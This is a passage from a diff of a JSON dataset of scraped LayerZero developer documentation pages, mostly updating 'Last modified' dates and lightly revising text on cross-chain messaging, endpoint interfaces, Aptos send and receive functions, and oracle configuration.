trustlessness on the specification of Oracle and Relayer, the two roles that are relaying block information and transaction proof across chains. Oracle A contract address that can be notified to move a block header. What is a Relayer? Any process that delivers a transaction proof in the LayerZero system. Messaging Library The contract that handles the message payload packing on the source chain and verification on the destination chain. Ultra-Light Node is an implementation of Messaging Library Proof Library The contract that verifies the validity of a proof. Merkle Patricia Tree inclusion proof is an implementation of Proof Library. Concepts - Previous Future-Proof Architecture Next - Concepts FAQ Last modified 3mo ago", "labels": [ "Documentation" ] @@ -1290,7 +1282,7 @@ { "title": "LayerZero Endpoint", "html_url": "https://layerzero.gitbook.io/docs/faq/layerzero-endpoint", - "body": "LayerZero Endpoint Messages in LayerZero are sent and received by LayerZero Endpoints , which handle message transmission, verification, and receipt; these endpoints consist of two components: a collection of versioned messaging libraries , and a proxy to route messages to the correct library version. When a message arrives at an endpoint, the endpoint selects the User Application configured library version to handle the message. The endpoint keeps all message states across versions and this allows libraries to be easily upgraded for fixes or optimizations. Messaging Library Versioning UAs can specify a particular messaging library version to tightly control messaging behaviors, or alternatively specify DEFAULT_VERSION to take advantage of library auto-upgrade. Note that the library versions on the send() and lzReceive() sides must be the same for an INFLIGHT message to be delivered. Ultra-Light Node is the V1 of messaging libraries. 
interface ILayerZeroEndpoint.sol // @notice set the send() LayerZero messaging library version to _version // @param _version - new messaging library version function setSendVersion ( uint16 _version ) external ; // @notice set the lzReceive() LayerZero messaging library version to _version // @param _version - new messaging library version function setReceiveVersion ( uint16 _version ) external ; // @notice get the send() LayerZero messaging library version // @param _userApplication - the contract address of the user application function getSendVersion ( address _userApplication ) external view returns ( uint16 ); // @notice get the lzReceive() LayerZero messaging library version // @param _userApplication - the contract address of the user application function getReceiveVersion ( address _userApplication ) external view returns ( uint16 ) Messaging Library Migration The LayerZero endpoint has only implemented one library version (Ultra-Light Node). We will release guides for migration when we have deployed any new messaging library. Concepts - Previous Messaging Properties Next - Concepts Future-Proof Architecture Last modified 3mo ago", + "body": "LayerZero Endpoint Messages in LayerZero are sent and received by LayerZero Endpoints , which handle message transmission, verification, and receipt; these endpoints consist of two components: a collection of versioned messaging libraries , and a proxy to route messages to the correct library version. When a message arrives at an endpoint, the endpoint selects the User Application configured library version to handle the message. The endpoint keeps all message states across versions and this allows libraries to be easily upgraded for fixes or optimizations. Messaging Library Versioning UAs can specify a particular messaging library version to tightly control messaging behaviors, or alternatively specify DEFAULT_VERSION to take advantage of library auto-upgrade. Note that the library versions on the send() and lzReceive() sides must be the same for an INFLIGHT message to be delivered. Ultra-Light Node is the V1 of messaging libraries. interface ILayerZeroEndpoint.sol // @notice set the send() LayerZero messaging library version to _version // @param _version - new messaging library version function setSendVersion ( uint16 _version ) external ; // @notice set the lzReceive() LayerZero messaging library version to _version // @param _version - new messaging library version function setReceiveVersion ( uint16 _version ) external ; // @notice get the send() LayerZero messaging library version // @param _userApplication - the contract address of the user application function getSendVersion ( address _userApplication ) external view returns ( uint16 ); // @notice get the lzReceive() LayerZero messaging library version // @param _userApplication - the contract address of the user application function getReceiveVersion ( address _userApplication ) external view returns ( uint16 ) Messaging Library Migration The LayerZero endpoint has only implemented one library version (Ultra-Light Node). We will release guides for migration when we have deployed any new messaging library. 
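As a usage note for the interface quoted above, a UA could pin and inspect its library versions like this. A minimal, hypothetical sketch; only the four functions shown in the quoted interface are assumed:

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

interface ILayerZeroEndpoint {
    function setSendVersion(uint16 _version) external;
    function setReceiveVersion(uint16 _version) external;
    function getSendVersion(address _userApplication) external view returns (uint16);
    function getReceiveVersion(address _userApplication) external view returns (uint16);
}

// Hypothetical UA that pins both sides to version 1 (Ultra-Light Node) instead of
// tracking DEFAULT_VERSION auto-upgrades. Remember that the send() and lzReceive()
// versions must match for an INFLIGHT message to be delivered.
contract VersionPinnedUA {
    ILayerZeroEndpoint public immutable lzEndpoint;

    constructor(address _endpoint) {
        lzEndpoint = ILayerZeroEndpoint(_endpoint);
        lzEndpoint.setSendVersion(1);
        lzEndpoint.setReceiveVersion(1);
    }

    function versions() external view returns (uint16 sendVersion, uint16 receiveVersion) {
        sendVersion = lzEndpoint.getSendVersion(address(this));
        receiveVersion = lzEndpoint.getReceiveVersion(address(this));
    }
}
```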
Concepts - Previous Messaging Properties Next - Concepts Future-Proof Architecture Last modified 21d ago", "labels": [ "Documentation" ] @@ -1298,7 +1290,7 @@ { "title": "Messaging Properties", "html_url": "https://layerzero.gitbook.io/docs/faq/messaging-properties", - "body": "Messaging Properties Message State Messages are sent from the User Application (UA) at source srcUA to the UA at the destination dstUA . Once the message is received by dstUA , the message is considered delivered (transitioning from INFLIGHT to either SUCCESS or STORED ) Message State Cases INFLIGHT After a message is sent SUCCESS A1: dstUA success OK() A2: dstUA fails with caught error/exception STORED B1: dstUA fails with uncaught error/exception // message handling at destination chain try ILayerZeroReceiver ( _dstAddress ). lzReceive { gas : _gasLimit }( _srcChainId , _srcAddress , _nonce , _payload ) { // message state becomes SUCCESS } catch { // message state becomes STORED emit PayloadStored ( _srcChainId , _srcAddress , _dstAddress , _payload ); } Case A2: dstUA is expected to store the message in their contract to be retried (LayerZero will not store any successfully delivered messages). dstUA is expected to monitor and retry STORED messages on behalf of its users. Case B1: dstUA is expected to gracefully handle all errors/exceptions when receiving a message, and any uncaught errors/exceptions (including out-of-gas) will cause the message to transition into STORED . A STORED message will block the delivery of any future message from srcUA to all dstUA on the same destination chain and can be retried until the message becomes SUCCESS . dstUA should implement a handler to transition the stored message from STORED to SUCCESS . If a bug in dstUA contract results in an unrecoverable error/exception, LayerZero provides a last-resort interface to force resume message delivery, only by the dstUA contract. Message Ordering LayerZero provides ordered delivery of messages from a given sender to a destination chain, i.e. srcUA -> dstChain . In other words, the message order nonce is shared by all dstUA on the same dstChain . That's why a STORED message blocks the message pathway from srcUA to all dstUA on the same destination chain. If it isn't necessary to preserve the sequential nonce property for a particular dstUA the sender must add the nonce into the payload and handle it end-to-end within the UA. UAs can implement a non-blocking pattern in their contract code. Extensibility Message Adapter Parameters LayerZero allows UAs to add arbitrary transaction params in the send() function, providing a high level of flexibility and opening up opportunities for a diverse set of 3rd party plugins This is implemented as an unreserved byte array parameter to the send() function, with UAs allowed to write any additional data necessary into that parameter. We recommend that UAs leave some degree of configurability for the extra parameters to allow for feature extensions. One great feature of _adapterParams is performing an Airdrop . Patterns Non-Reentrancy LayerZero Endpoint has a non-reentrancy guard for both the send() and receive() , respectively. In other words, both send() and receive() can not call themselves on the same chain. UAs should not rely on LayerZero to perform the non-reentrancy check. However, UAs can query the endpoint to see if the endpoint isSendingPayload() or isReceivingPayload() for finer-grained reentrancy control. Message Chaining UAs can call send() in the receive() calls on the same chain. 
Example applications for calling send() in the receive() include (e.g. Ping Pong ): the UA at the source chain wants a message receipt (Chain A -> Chain B -> Chain A) the UA at the destination reroutes the message (Chain A -> Chain B -> Chain C) function lzReceive ( uint16 _srcChainId , bytes memory _fromAddress , uint64 , /*_nonce*/ bytes memory _payload ) external override { ... // message chaining endpoint . send { value : messageFee }( ... ); } However, the fee for sending messages on another chain is not observable on-chain. UAs would need to create some fee estimate heuristics. Optionally, user apps can store the chained message and then resend them with another transaction. Multi-Send UAs can send multiple messages in one transaction at the source chain. The endpoint non-reentrancy will not block this pattern. function sendFirstMessage ( uint gasAmountForDst , uint16 [] calldata chainIds , bytes [] calldata dstAddresses ) external payable { ... for ( uint i = 0 ; i < chainIds . length ; i ++ ){ endpoint . send { value : fee }( chainIds [ i ], dstAddresses [ i ], messageString , msg . sender , address ( 0x0 ), _relayerParams ); } } Bug Bounty - Previous Bug Bounty Program Next - Concepts LayerZero Endpoint Last modified 3mo ago", + "body": "Messaging Properties Message State Messages are sent from the User Application (UA) at source srcUA to the UA at the destination dstUA . Once the message is received by dstUA , the message is considered delivered (transitioning from INFLIGHT to either SUCCESS or STORED ) Message State Cases INFLIGHT After a message is sent SUCCESS A1: dstUA success OK() A2: dstUA fails with caught error/exception STORED B1: dstUA fails with uncaught error/exception // message handling at destination chain try ILayerZeroReceiver ( _dstAddress ). lzReceive { gas : _gasLimit }( _srcChainId , _srcAddress , _nonce , _payload ) { // message state becomes SUCCESS } catch { // message state becomes STORED emit PayloadStored ( _srcChainId , _srcAddress , _dstAddress , _payload ); } Case A2: dstUA is expected to store the message in their contract to be retried (LayerZero will not store any successfully delivered messages). dstUA is expected to monitor and retry STORED messages on behalf of its users. Case B1: dstUA is expected to gracefully handle all errors/exceptions when receiving a message, and any uncaught errors/exceptions (including out-of-gas) will cause the message to transition into STORED . A STORED message will block the delivery of any future message from srcUA to all dstUA on the same destination chain and can be retried until the message becomes SUCCESS . dstUA should implement a handler to transition the stored message from STORED to SUCCESS . If a bug in dstUA contract results in an unrecoverable error/exception, LayerZero provides a last-resort interface to force resume message delivery, only by the dstUA contract. Message Ordering LayerZero provides ordered delivery of messages from a given sender to a destination chain, i.e. srcUA -> dstChain . In other words, the message order nonce is shared by all dstUA on the same dstChain . That's why a STORED message blocks the message pathway from srcUA to all dstUA on the same destination chain. If it isn't necessary to preserve the sequential nonce property for a particular dstUA the sender must add the nonce into the payload and handle it end-to-end within the UA. UAs can implement a non-blocking pattern in their contract code. 
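The non-blocking pattern mentioned above can be sketched as follows. This is an illustrative skeleton (names like handle and retry are made up; the endpoint and trusted-remote checks are reduced to comments): the app logic runs inside a try/catch via an external self-call, and a failed payload is stored for later retry instead of blocking the nonce-ordered channel. The packaged implementation of this idea is NonblockingLzApp in solidity-examples.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

abstract contract NonblockingReceiverSketch {
    // hash of each failed payload, keyed by (srcChainId, srcAddress, nonce)
    mapping(uint16 => mapping(bytes => mapping(uint64 => bytes32))) public failedMessages;

    event MessageFailed(uint16 srcChainId, bytes srcAddress, uint64 nonce, bytes payload);

    function lzReceive(uint16 _srcChainId, bytes calldata _srcAddress, uint64 _nonce, bytes calldata _payload) external {
        // NOTE: a real UA must also require msg.sender == endpoint and
        // _srcAddress == trusted remote (omitted here for brevity).
        try this.handle(_srcChainId, _srcAddress, _nonce, _payload) {
            // delivered: the channel advances
        } catch {
            // store and move on instead of blocking the pathway
            failedMessages[_srcChainId][_srcAddress][_nonce] = keccak256(_payload);
            emit MessageFailed(_srcChainId, _srcAddress, _nonce, _payload);
        }
    }

    // external so the try/catch above can catch reverts in the app logic
    function handle(uint16, bytes calldata, uint64, bytes calldata _payload) external {
        require(msg.sender == address(this), "only self");
        _app(_payload);
    }

    // anyone may retry a stored message at any time
    function retry(uint16 _srcChainId, bytes calldata _srcAddress, uint64 _nonce, bytes calldata _payload) external {
        require(failedMessages[_srcChainId][_srcAddress][_nonce] == keccak256(_payload), "no stored message");
        delete failedMessages[_srcChainId][_srcAddress][_nonce];
        _app(_payload);
    }

    function _app(bytes calldata _payload) internal virtual;
}
```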
Extensibility Message Adapter Parameters LayerZero allows UAs to add arbitrary transaction params in the send() function, providing a high level of flexibility and opening up opportunities for a diverse set of 3rd party plugins This is implemented as an unreserved byte array parameter to the send() function, with UAs allowed to write any additional data necessary into that parameter. We recommend that UAs leave some degree of configurability for the extra parameters to allow for feature extensions. One great feature of _adapterParams is performing an Airdrop . Patterns Non-Reentrancy LayerZero Endpoint has a non-reentrancy guard for both the send() and receive() , respectively. In other words, both send() and receive() can not call themselves on the same chain. UAs should not rely on LayerZero to perform the non-reentrancy check. However, UAs can query the endpoint to see if the endpoint isSendingPayload() or isReceivingPayload() for finer-grained reentrancy control. Message Chaining UAs can call send() in the receive() calls on the same chain. Example applications for calling send() in the receive() include (e.g. Ping Pong ): the UA at the source chain wants a message receipt (Chain A -> Chain B -> Chain A) the UA at the destination reroutes the message (Chain A -> Chain B -> Chain C) function lzReceive ( uint16 _srcChainId , bytes memory _fromAddress , uint64 , /*_nonce*/ bytes memory _payload ) external override { ... // message chaining endpoint . send { value : messageFee }( ... ); } However, the fee for sending messages on another chain is not observable on-chain. UAs would need to create some fee estimate heuristics. Optionally, user apps can store the chained message and then resend them with another transaction. Multi-Send UAs can send multiple messages in one transaction at the source chain. The endpoint non-reentrancy will not block this pattern. function sendFirstMessage ( uint gasAmountForDst , uint16 [] calldata chainIds , bytes [] calldata dstAddresses ) external payable { ... for ( uint i = 0 ; i < chainIds . length ; i ++ ){ endpoint . send { value : fee }( chainIds [ i ], dstAddresses [ i ], messageString , msg . sender , address ( 0x0 ), _relayerParams ); } } Bug Bounty - Previous Bug Bounty Program Next - Concepts LayerZero Endpoint Last modified 21d ago", "labels": [ "Documentation" ] @@ -1306,15 +1298,23 @@ { "title": "Audits", "html_url": "https://layerzero.gitbook.io/docs/technical-reference/audits", - "body": "Audits LayerZero Labs has commissioned 35+ audits with the most recent audits on Github . Nearly all code written by LayerZero Labs since inception have been immutable smart contracts audited externally and rigorously reviewed internally at least 3+ times each. GitHub - LayerZero-Labs/Audits GitHub LayerZero Labs Audit Repository Previous Deprecated Libraries Last modified 7mo ago", + "body": "Audits LayerZero Labs has commissioned 35+ audits with the most recent audits on Github . Nearly all code written by LayerZero Labs since inception have been immutable smart contracts audited externally and rigorously reviewed internally at least 3+ times each. 
GitHub - LayerZero-Labs/Audits GitHub LayerZero Labs Audit Repository Previous Deprecated Libraries Last modified 8mo ago", "labels": [ "Documentation" ] }, { - "title": "LayerZero Interfaces", + "title": "Interfaces", "html_url": "https://layerzero.gitbook.io/docs/technical-reference/interfaces", - "body": "LayerZero Interfaces Developers may need one or more of these interfaces when working with LayerZero contracts. https://github.com/LayerZero-Labs/LayerZero/tree/main/contracts/interface github.com Ultra-Light Node Interfaces See our contract interfaces here . Previous Multisig Wallets Next - Technical Reference SDK Last modified 3mo ago", + "body": "Interfaces Interfaces to the LayerZero contracts Interfaces for interacting with LayerZero contracts, including the Endpoint . Previous Multisig Wallets Next EVM (Solidity) Interfaces Last modified 21d ago", + "labels": [ + "Documentation" + ] + }, + { + "title": "LayerZero Interfaces", + "html_url": "https://layerzero.gitbook.io/docs/technical-reference/interfaces-1", + "body": "LayerZero Interfaces Developers may need one or more of these interfaces when working with LayerZero contracts. https://github.com/LayerZero-Labs/solidity-examples/blob/main/contracts/lzApp/interfaces Ultra-Light Node Interfaces See our contract interfaces here . Previous ILayerZeroRelayer.sol Next - Technical Reference SDK Last modified 21d ago", "labels": [ "Documentation" ] @@ -1322,7 +1322,7 @@ { "title": "Mainnet", "html_url": "https://layerzero.gitbook.io/docs/technical-reference/mainnet", - "body": "Mainnet LayerZero mainnet deployments. The Mainnet Contract Addresses are all you need to start sending messages. LayerZero endpoints are deployed onto a variety of chains, including the primary L1s and possibly even some experimental chains! To start sending messages here is an outline what you'll need: Access to JSON-RPC provider data, for the chains you want to use (or your own nodes) ETH, BNB, AVAX, etc.. for the chains you need Hardhat project (perhaps check out our solidity-examples repo) Good vibes Previous Default Config Next Mainnet Addresses Last modified 1mo ago", + "body": "Mainnet LayerZero mainnet deployments. The Mainnet Contract Addresses are all you need to start sending messages. LayerZero endpoints are deployed onto a variety of chains, including the primary L1s and possibly even some experimental chains! To start sending messages here is an outline what you'll need: Access to JSON-RPC provider data, for the chains you want to use (or your own nodes) ETH, BNB, AVAX, etc.. for the chains you need Hardhat project (perhaps check out our solidity-examples repo) Good vibes Previous Default Config Next Mainnet Addresses Last modified 2mo ago", "labels": [ "Documentation" ] @@ -1338,7 +1338,7 @@ { "title": "SDK", "html_url": "https://layerzero.gitbook.io/docs/technical-reference/sdk", - "body": "SDK Coming Soon SDK for Testnet / Mainnet Deployment Addresses. Technical Reference - Previous LayerZero Interfaces Next - Technical Reference Proof Types Last modified 3mo ago", + "body": "SDK Coming Soon SDK for Testnet / Mainnet Deployment Addresses. Technical Reference - Previous LayerZero Interfaces Next - Technical Reference Proof Types Last modified 4mo ago", "labels": [ "Documentation" ] @@ -1346,7 +1346,7 @@ { "title": "Testnet", "html_url": "https://layerzero.gitbook.io/docs/technical-reference/testnet", - "body": "Testnet LayerZero testnet is a deployed set of Endpoints on the chains we operate on. 
The Testnet Contract Addresses are all you need to start sending messages. LayerZero endpoints are deployed onto a variety of chains, including the primary L1s and possibly even some experimental chains! To start sending messages here is an outline what you'll need: Access to JSON-RPC provider data, for the chains you want to use (or your own nodes) Test ether Hardhat project (perhaps check out our solidity-examples repo) Good vibes Previous zkLightClient Addresses Next Testnet Addresses Last modified 13d ago", + "body": "Testnet LayerZero testnet is a deployed set of Endpoints on the chains we operate on. The Testnet Contract Addresses are all you need to start sending messages. LayerZero endpoints are deployed onto a variety of chains, including the primary L1s and possibly even some experimental chains! To start sending messages here is an outline what you'll need: Access to JSON-RPC provider data, for the chains you want to use (or your own nodes) Test ether Hardhat project (perhaps check out our solidity-examples repo) Good vibes Previous zkLightClient Addresses Next Testnet Addresses Last modified 1mo ago", "labels": [ "Documentation" ] @@ -1354,7 +1354,7 @@ { "title": "Estimating Message Fees", "html_url": "https://layerzero.gitbook.io/docs/aptos-guide/code-examples/estimating-message-fees", - "body": "Estimating Message Fees Get the quantity of native gas token to pay to send a message If you want to know how much AptosCoin to pay for the message, you can call the Endpoint's quote_fee() to get the fee tuple (native_fee (in coin), layerzero_fee (in coin)). public fun quote_fee ( ua_address : address , dst_chain_id : u64 , payload_size : u64 , pay_in_zro : bool , adapter_params : vector < u8 > , msglib_params : vector < u8 > ): ( u64 , u64 ) Previous OmniCounter.move Next - Aptos Guide UA Custom Configuration Last modified 3mo ago", + "body": "Estimating Message Fees Get the quantity of native gas token to pay to send a message If you want to know how much AptosCoin to pay for the message, you can call the Endpoint's quote_fee() to get the fee tuple (native_fee (in coin), layerzero_fee (in coin)). public fun quote_fee ( ua_address : address , dst_chain_id : u64 , payload_size : u64 , pay_in_zro : bool , adapter_params : vector < u8 > , msglib_params : vector < u8 > ): ( u64 , u64 ) Previous OmniCounter.move Next - Aptos Guide UA Custom Configuration Last modified 4mo ago", "labels": [ "Documentation" ] @@ -1362,7 +1362,7 @@ { "title": "OmniCounter.move", "html_url": "https://layerzero.gitbook.io/docs/aptos-guide/code-examples/messagecounter.move", - "body": "OmniCounter.move A LayerZero User Application example to demonstrate message sending. The OmniCounter OmniCounter is a contract that increments a counter -- but there's a twist. This OmniCounter increments the counter on another chain. The Details To send cross chain messages, contracts will use an endpoint to send() from the source chain and lz_receive() to receive the message on the destination chain. LayerZero-Aptos-Contract/counter.move at main LayerZero-Labs/LayerZero-Aptos-Contract GitHub Aptos Guide - Previous Code Examples Next Estimating Message Fees Last modified 10mo ago", + "body": "OmniCounter.move A LayerZero User Application example to demonstrate message sending. The OmniCounter OmniCounter is a contract that increments a counter -- but there's a twist. This OmniCounter increments the counter on another chain. 
The Details To send cross chain messages, contracts will use an endpoint to send() from the source chain and lz_receive() to receive the message on the destination chain. LayerZero-Aptos-Contract/counter.move at main LayerZero-Labs/LayerZero-Aptos-Contract GitHub Aptos Guide - Previous Code Examples Next Estimating Message Fees Last modified 18d ago", "labels": [ "Documentation" ] @@ -1370,7 +1370,7 @@ { "title": "Register UA", "html_url": "https://layerzero.gitbook.io/docs/aptos-guide/master/how-to-send-a-message", - "body": "Register UA Before sending messages on LayerZero you need to register your UA. public fun register_ua < UA > ( account : & signer ): UaCapability < UA > The UA type is an identifier of your application. You can use any type as UA , e.g. 0x1::MyApp::MyApp as a UA . Only one UA is allowed per address. That means there won't be a case where two UA types share the same address. When calling register_ua() , you will get a UaCapability returned. It is the resource for authenticating any LayerZero functions, such as sending messages and setting configurations. Aptos Guide - Previous Getting Started Next Send Messages Last modified 3mo ago", + "body": "Register UA Before sending messages on LayerZero you need to register your UA. public fun register_ua < UA > ( account : & signer ): UaCapability < UA > The UA type is an identifier of your application. You can use any type as UA , e.g. 0x1::MyApp::MyApp as a UA . Only one UA is allowed per address. That means there won't be a case where two UA types share the same address. When calling register_ua() , you will get a UaCapability returned. It is the resource for authenticating any LayerZero functions, such as sending messages and setting configurations. Aptos Guide - Previous Getting Started Next Send Messages Last modified 4mo ago", "labels": [ "Documentation" ] @@ -1378,7 +1378,7 @@ { "title": "Send Messages", "html_url": "https://layerzero.gitbook.io/docs/aptos-guide/master/how-to-send-a-message-1", - "body": "Send Messages Use LayerZero to send a bytes payload from one chain to another. To send a message, call the Endpoint's send() function. Initiate the send() function in your contracts to send a cross chain message. public fun send < UA > ( dst_chain_id : u64 , dst_address : vector < u8 > , payload : vector < u8 > , native_fee : Coin < AptosCoin > , zro_fee : Coin < ZRO > , adapter_params : vector < u8 > , msglib_params : vector < u8 > , _cap : & UaCapability < UA > ): ( u64 , Coin < AptosCoin > , Coin < ZRO > ) You can send any message ( payload ) to any address on any chain and pay fee with AptosCoin . So far we only support AptosCoin as fee. ZRO coin will be supported to pay the protocol fee in the future. The msglib_params is for passing parameters to the message libraries. So far, it is not used and can be empty. Estimating Message Fees If you want to know how much to give to the send() function to pay for you message please refer to this section on estimating fees . Previous Register UA Next Receive Messages Last modified 3mo ago", + "body": "Send Messages Use LayerZero to send a bytes payload from one chain to another. To send a message, call the Endpoint's send() function. Initiate the send() function in your contracts to send a cross chain message. 
public fun send < UA > ( dst_chain_id : u64 , dst_address : vector < u8 > , payload : vector < u8 > , native_fee : Coin < AptosCoin > , zro_fee : Coin < ZRO > , adapter_params : vector < u8 > , msglib_params : vector < u8 > , _cap : & UaCapability < UA > ): ( u64 , Coin < AptosCoin > , Coin < ZRO > ) You can send any message ( payload ) to any address on any chain and pay the fee with AptosCoin . So far we only support AptosCoin as the fee. ZRO coin will be supported to pay the protocol fee in the future. The msglib_params is for passing parameters to the message libraries. So far, it is not used and can be empty. Estimating Message Fees If you want to know how much to give to the send() function to pay for your message, please refer to this section on estimating fees . Previous Register UA Next Receive Messages Last modified 4mo ago", "labels": [ "Documentation" ] @@ -1386,7 +1386,7 @@ { "title": "Receive Messages", "html_url": "https://layerzero.gitbook.io/docs/aptos-guide/master/receive-messages", - "body": "Receive Messages Destination contracts must implement lz_receive() to handle incoming messages The UA has to provide a public entry function lz_receive() for executors to receive messages from other chains and execute your business logic. public entry fun lz_receive < Type1 , Type2 , ... > ( src_chain_id : u64 , src_address : vector < u8 > , payload : vector < u8 > ) The lz_receive() function has to call the Endpoint's lz_receive() function to verify the payload and get the nonce. // endpoint's lz_receive() public fun lz_receive < UA > ( src_chain_id : u64 , src_address : vector < u8 > , payload : vector < u8 > , _cap : & UaCapability < UA > ): u64 When an executor calls your UA's lz_receive() , it needs to know what generic types to use for consuming the payload. So if your UA needs those types, you also need to provide a public entry function lz_receive_types() to return the types. 
Make sure to assert the provided types against the payload. For example, if the payload indicates coinType A, then the provided coinType must be A. public fun lz_receive_types ( src_chain_id : u64 , src_address : vector < u8 > , payload : vector < u8 > ): vector < TypeInfo > Blocking Mode LayerZero is BLOCKING by default, which means that if the message payload fails in the lz_receive() function, your UA will be blocked and cannot receive subsequent messages from that path until the failed message is received successfully. If this happens, you may have to drop the message or store it and retry later. We provide LZApp Modules to help you handle it. Previous Send Messages Next - Aptos Guide LZApp Modules Last modified 3mo ago", + "body": "Receive Messages Destination contracts must implement lz_receive() to handle incoming messages The UA has to provide a public entry function lz_receive() for executors to receive messages from other chains and execute your business logic. public entry fun lz_receive < Type1 , Type2 , ... > ( src_chain_id : u64 , src_address : vector < u8 > , payload : vector < u8 > ) The lz_receive() function has to call the Endpoint's lz_receive() function to verify the payload and get the nonce. // endpoint's lz_receive() public fun lz_receive < UA > ( src_chain_id : u64 , src_address : vector < u8 > , payload : vector < u8 > , _cap : & UaCapability < UA > ): u64 When an executor calls your UA's lz_receive() , it needs to know what generic types to use for consuming the payload. So if your UA needs those types, you also need to provide a public entry function lz_receive_types() to return the types. Make sure to assert the provided types against the payload. For example, if the payload indicates coinType A, then the provided coinType must be A. public fun lz_receive_types ( src_chain_id : u64 , src_address : vector < u8 > , payload : vector < u8 > ): vector < TypeInfo > Blocking Mode LayerZero is BLOCKING by default, which means that if the message payload fails in the lz_receive() function, your UA will be blocked and cannot receive subsequent messages from that path until the failed message is received successfully. If this happens, you may have to drop the message or store it and retry later. We provide LZApp Modules to help you handle it. Previous Send Messages Next - Aptos Guide LZApp Modules Last modified 4mo ago", "labels": [ "Documentation" ] @@ -1394,7 +1394,7 @@ { "title": "Chainlink Oracle", "html_url": "https://layerzero.gitbook.io/docs/ecosystem/oracle/chainlink-oracle", - "body": "Chainlink Oracle Contract Addresses to use Chainlink with LayerZero To use the Chainlink oracle with your LayerZero UserApplication, configure your app with the addresses below. Chainlink Oracle Addresses Ethereum: 0x150A58e9E6BF69ccEb1DBA5ae97C166DC8792539 BNB: 0x150A58e9E6BF69ccEb1DBA5ae97C166DC8792539 Avalanche: 0x150A58e9E6BF69ccEb1DBA5ae97C166DC8792539 Polygon: 0x150A58e9E6BF69ccEb1DBA5ae97C166DC8792539 Arbitrum: 0x150A58e9E6BF69ccEb1DBA5ae97C166DC8792539 Optimism: 0x150A58e9E6BF69ccEb1DBA5ae97C166DC8792539 Fantom: 0x150A58e9E6BF69ccEb1DBA5ae97C166DC8792539 There is some additional information for Chainlink that can be found here . Participating Node Operators Currently these Chainlink nodes provide support and redundancy for the Chainlink Oracle DexTrac Chainlayer LinkForest LinkPool Previous TSS Oracle Next Overview of Polyhedra zkLightClient Last modified 16d ago", + "body": "Chainlink Oracle Contract Addresses to use Chainlink with LayerZero To use the Chainlink oracle with your LayerZero UserApplication, configure your app with the addresses below. Chainlink Oracle Addresses Ethereum: 0x150A58e9E6BF69ccEb1DBA5ae97C166DC8792539 BNB: 0x150A58e9E6BF69ccEb1DBA5ae97C166DC8792539 Avalanche: 0x150A58e9E6BF69ccEb1DBA5ae97C166DC8792539 Polygon: 0x150A58e9E6BF69ccEb1DBA5ae97C166DC8792539 Arbitrum: 0x150A58e9E6BF69ccEb1DBA5ae97C166DC8792539 Optimism: 0x150A58e9E6BF69ccEb1DBA5ae97C166DC8792539 Fantom: 0x150A58e9E6BF69ccEb1DBA5ae97C166DC8792539 There is some additional information for Chainlink that can be found here . Participating Node Operators Currently these Chainlink nodes provide support and redundancy for the Chainlink Oracle DexTrac Chainlayer LinkForest LinkPool Previous TSS Oracle Next Overview of Polyhedra zkLightClient Last modified 1mo ago", "labels": [ "Documentation" ] @@ -1402,7 +1402,7 @@ { "title": "Configuring Custom Oracle", "html_url": "https://layerzero.gitbook.io/docs/ecosystem/oracle/configuring-custom-oracle", - "body": "Configuring Custom Oracle Learn how to seamlessly set up and integrate a new Oracle for your User Application (UA). This tutorial provides a step-by-step guide on setting a new Oracle for your User Application (UA). Understanding Oracle Configuration In LayerZero, Oracle configurations help enable smooth messaging across chain pathways. A chain pathway represents a connected route that utilizes both the Oracle and Relayer to facilitate message routing between blockchains. 1. Consistent Oracle Configuration: It's essential to ensure that the same Oracle provider is present on both the source and destination chains. 
This uniformity guarantees that messages can be reliably sent and received in both directions on the pathway. 2. Payment and Delivery Logic: If you're paying Oracle A on the source chain, you'd expect Oracle A to also handle the delivery on the destination chain. Hence, if Oracle A is available on both chains, it can be used in both directions. On the other hand, if Oracle A is only present on one chain, you'd need to opt for an alternative that's supported on both chain directions. Remember, the objective is to ensure that the Oracle setup supports the chain pathways, as they are the conduits for message routing. This is vital for efficient, error-free cross-chain communication. Prerequisites You should have an LZApp to start with that's already working with default settings. While we use OmniCounter in this tutorial, any app that inherits LZApp.sol (including the OFT and ONFT standards) can be used. In order to set a new Oracle, all a user will need to do is call the setConfig function on Chain A and Chain B. Below is a simple example for how to set your Oracle, using the Ethereum Goerli and Optimism Goerli Testnets. Example: Setting an Oracle using Ethereum Goerli and Optimism Goerli Testnets 1. Deploying OmniCounter After deploying OmniCounter on both Goerli and OP-Goerli, ensure that: You've correctly called setTrustedRemote . The incrementCounter function works by default on both contracts. // SPDX-License-Identifier: MIT pragma solidity ^ 0.8.0 ; pragma abicoder v2 ; import \"https://github.com/LayerZero-Labs/solidity-examples/blob/e43908440cefdcbc93cd8e0ea863326c4bd904eb/contracts/lzApp/NonblockingLzApp.sol\" ; /// @title A LayerZero example sending a cross chain message from a source chain to a destination chain to increment a counter contract OmniCounter is NonblockingLzApp { bytes public constant PAYLOAD = \"\\x01\\x02\\x03\\x04\" ; uint public counter ; constructor ( address _lzEndpoint ) NonblockingLzApp ( _lzEndpoint ) {} function _nonblockingLzReceive ( uint16 , bytes memory , uint64 , bytes memory ) internal override { counter += 1 ; } function estimateFee ( uint16 _dstChainId , bool _useZro , bytes calldata _adapterParams ) public view returns ( uint nativeFee , uint zroFee ) { return lzEndpoint . estimateFees ( _dstChainId , address ( this ), PAYLOAD , _useZro , _adapterParams ); } function incrementCounter ( uint16 _dstChainId ) public payable { _lzSend ( _dstChainId , PAYLOAD , payable ( msg . sender ), address ( 0x0 ), bytes ( \"\" ), msg . value ); } } 2. Setting a New Oracle To modify your UA contracts, you'll need to invoke the setConfig function. This can be done directly from a verified block explorer or using scripting tools. In this tutorial, we'll demonstrate using Remix. Here's how to set the Oracle for the Goerli OmniCounter using the Goerli TSS Oracle address, 0x36ebea3941907c438ca8ca2b1065deef21ccdaed : 1 let config = ethers . utils . defaultAbiCoder . encode ( 2 [ \"address\" ], 3 [ \"0x36ebea3941907c438ca8ca2b1065deef21ccdaed\" ] // oracleAddress 4 ) 5 await lzEndpoint . setConfig ( 6 0 , // default library version 7 10132 , // dstChainId 8 6 , // CONFIG_TYPE_ORACLE 9 0x00000000000000000000000036ebea3941907c438ca8ca2b1065deef21ccdaed // config 10 ) This process should be repeated on both the source and destination contracts. Ensure you adjust the _dstChainId and oracleAddress based on the contract's location. For instance, on OP Goerli, use the OP Goerli TSS Oracle Address and set the destination chain to 10121 for Goerli ETH. 
